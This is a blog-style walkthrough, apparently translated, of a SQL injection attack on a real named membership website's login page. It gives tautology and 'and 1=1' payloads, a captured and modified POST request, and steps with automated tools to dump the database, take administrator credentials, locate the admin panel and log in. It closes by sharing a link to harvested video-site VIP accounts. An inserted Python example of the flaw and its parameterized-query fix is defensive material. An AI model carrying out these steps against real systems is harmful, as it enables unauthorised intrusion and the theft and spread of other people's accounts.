Write a SQL injection session

Source: Internet
Author: User
Tags: ming, sql injection

I found this vulnerability a while ago and carried out the injection successfully, but I was afraid the site would be abused if I posted it, so I held it back. Looking today, the original page is no longer accessible, so posting it now should be no big problem.

This article is only for learning and communication; the purpose is to build a more secure network environment!

Inject address

A certain VIP member system: http://www.tcmpv.com/index.php/Home/Public/login.html

Related tools

Injection tools:

Super SQL Injection Tool "Ssqlinjection" http://www.shack2.org/article/1417357815.html

Ming Boy

Packet capture tool:

Wireshark

Injection process

1. Testing the vulnerability

1) Test '

First open the web page, such as:

Looking at this very low-end system, there may well be loopholes.

Without further ado, enter the single quote "'" to test:

Enter single quotation marks

Test results

Seeing the test result report a database error proves that the system has a SQL injection vulnerability. And this careless programmer even exposed the database table name directly (tp_login); this is practically equivalent to writing:

"I have loopholes, welcome to inject!"

2) Test ' or ' = '

Testing further, enter "' or ' = '" and click OK; it goes straight to login success, such as:

Enter "' or ' = '", click OK

Login successful

Without a password you walk straight in, so the loophole really does exist!

3) Test 3389 ' and 1=1 and ' a ' = ' a

Next, test whether an injection statement can be used here. There are two options:

    • Continue using the OR statement
    • Find the real password

The OR statement was already covered above (the password approach works on the same principle).

The way to get the password is given directly on the web page:

Join the group and get the password: 3389

Construct a new injection statement, "3389 ' and 1=1 and ' a ' = ' a", and test it:

Logged in successfully again, confirming that an injection attack can be carried out.

Next you can guess the database name (as mentioned earlier, the login error message already contains the table name "Tp_login", really easy), table names, column names, and so on.

The specific method of manual guessing can be found here:

SQL injection Instance analysis (http://www.cnblogs.com/leftshine/p/SQLInjection.html)

Of course, the amount of manual guessing is too large, so laborious work like this should be handed over to a program. But it is strongly recommended to read that article first to understand the basic principles of SQL injection; otherwise you will be operating blind.
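To make the "basic principle" concrete from the defender's side, here is an added example that is not code from the article or from the site it describes. It builds a small SQLite stand-in for the page's login table (the table name "tp_login" and the password "3389" come from the article; the column name login_key is an assumption) and runs the article's test inputs against two versions of the login query: the string-concatenated one that makes the site vulnerable, and the parameterized one that fixes it. The tautology input is written compactly (' or ''=') so that it parses cleanly in SQLite.

```python
import sqlite3

# Constructed stand-in for the site's login table: the article names the
# table "tp_login" and the real password "3389"; the column name is assumed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tp_login (id INTEGER PRIMARY KEY, login_key TEXT NOT NULL)"
    )
    conn.execute("INSERT INTO tp_login (login_key) VALUES ('3389')")
    conn.commit()
    return conn


def login_vulnerable(conn, key):
    """The weak pattern: the submitted value is pasted into the SQL text,
    so quotes and operators inside it become part of the query."""
    sql = "SELECT COUNT(*) FROM tp_login WHERE login_key = '" + key + "'"
    try:
        (n,) = conn.execute(sql).fetchone()
    except sqlite3.Error:
        # An unbalanced quote breaks the statement. A site that echoes this
        # database error to the browser is what the article's "test '" step
        # observes; the fix for that part is to log the error, not display it.
        return "error"
    return "ok" if n > 0 else "failed"


def login_parameterized(conn, key):
    """The fix: a placeholder keeps the value as data, never as SQL syntax."""
    sql = "SELECT COUNT(*) FROM tp_login WHERE login_key = ?"
    (n,) = conn.execute(sql, (key,)).fetchone()
    return "ok" if n > 0 else "failed"


# The article's three test inputs (tautology written compactly) plus the
# real password, all constructed here for the demonstration.
TEST_INPUTS = {
    "quote": "'",
    "tautology": "' or ''='",
    "known_password_with_and": "3389' and 1=1 and 'a'='a",
    "real_password": "3389",
}


def run_demo():
    """Return {input name: (concatenated result, parameterized result)}."""
    conn = make_db()
    results = {}
    for name, value in TEST_INPUTS.items():
        results[name] = (login_vulnerable(conn, value),
                         login_parameterized(conn, value))
    return results


if __name__ == "__main__":
    for name, (vuln, safe) in run_demo().items():
        print(f"{name:26s} concatenated={vuln:7s} parameterized={safe}")
```

Running it shows the three behaviours the article observes, and that the parameterized query only accepts the real password: the lone quote produces a database error, the tautology logs in, and the "known password + and 1=1" form logs in, all only under concatenation.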

2. Construct the packet

Because this system does not simply pass the login data through the URL, we need to construct a POST packet and send the injection in it.

1) Manual construction:

Manually build a data packet for injection according to the structure of a POST request; exactly how to build one means learning the network protocol properly...

2) Capture-based construction

This is much simpler: we directly capture the packet the browser normally sends, and a modified version of it can be used for injection!

Here we use Wireshark to capture the packet. On capturing and analyzing HTTP packets with Wireshark, refer here: Application layer protocol FTP, DNS protocol, HTTP protocol analysis (http://www.cnblogs.com/leftshine/p/5698890.html)

The contents of the POST packet captured with Wireshark are as follows:

POST /index.php/home/public/do_login.html HTTP/1.1
Host:www.tcmpv.com
Connection:keep-alive
Content-length:8
Cache-control:max-age=0
accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin:http://www.tcmpv.com
Upgrade-insecure-requests:1
user-agent:mozilla/5.0 (Windows NT 10.0; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/45.0.2454.101 safari/537.36
content-type:application/x-www-form-urlencoded
Referer:http://www.tcmpv.com/index.php/home/public/login.html
Accept-encoding:gzip, deflate
accept-language:zh-cn,zh;q=0.8
cookie:phpsessid=*****************************; uid=11; Num=1; Time=2016-07-30+10%3a55%3a47; a7207_pages=22; A7207_times=1

key=3389

Modify the POST packet for use in injection:

POST /index.php/home/public/do_login.html HTTP/1.1
Referer:http://www.tcmpv.com/index.php/home/public/login.html
user-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/42.0.2311.135 safari/537.36 edge/12.10240
content-type:application/x-www-form-urlencoded
Accept-encoding:gzip, deflate
Content-length:8
Host:www.tcmpv.com
Connection:keep-alive
Pragma:no-cache
cookie:phpsessid=*****************************; uid=11; Num=1; Time=2016-07-30+10%3a55%3a47; a7207_pages=22; A7207_times=1

key=3389<sencode>% ') #inject ##<eencode>

This packet can be generated automatically by the "Super SQL Injection Tool" from the captured packet above; please refer to the instructions for use included in the software archive.

3. Inject

In fact, all we need to do is paste the captured packet into the program and click "Automatic recognition"; the software configures the corresponding settings by itself, and we then adjust according to the situation (under normal circumstances the automatic configuration is enough).

Once configured, click "Send Data" to verify that the currently configured packet works; if the page information is returned correctly, the configuration is usable:

Return page information correctly

Although the figure shows "Login failed", this proves that the page information is returned correctly, so the configuration is usable!

4. Get Database Information

Click to get Data

Get Data

Then go to the datacenter, get library, get table, get column, get data:

Database Information at a glance

You can see that the "tp_login" table and the "3389" password are indeed as we already knew.

Next, data can be extracted at will.

The data obtained

Admin account information obtained:

Administrator account Information

With the administrator account information in hand, how do we use it? On to the second piece of software, "Ming Boy". It is actually an injection tool too, but perhaps it is simply too old... many of its features are no longer practical. Here we only use its "Manage Portal scan" feature (a scan for admin login pages), such as:

Manage Portal Scans

It finds 4 links; opening them one by one, this one turns out to be usable:

Http://www.tcmpv.com/index.php/Admin/Public/login.html

Administrator Login

Enter the account and password, log in

Login successful

Login successful; seeing the smiley face really makes you happy!

Successfully entered the background

Having successfully entered the management back end, I found there was no valuable information, but there were a lot of VIP accounts for a video site; whether these accounts, shared by thousands of people, are still usable I don't know...

At this point the entire SQL injection has been completed successfully!

Benefits (account acquired after injection):---------------- Split Line ---Link: https://eyun.baidu.com/s/3boCXbXl password: iqiyi
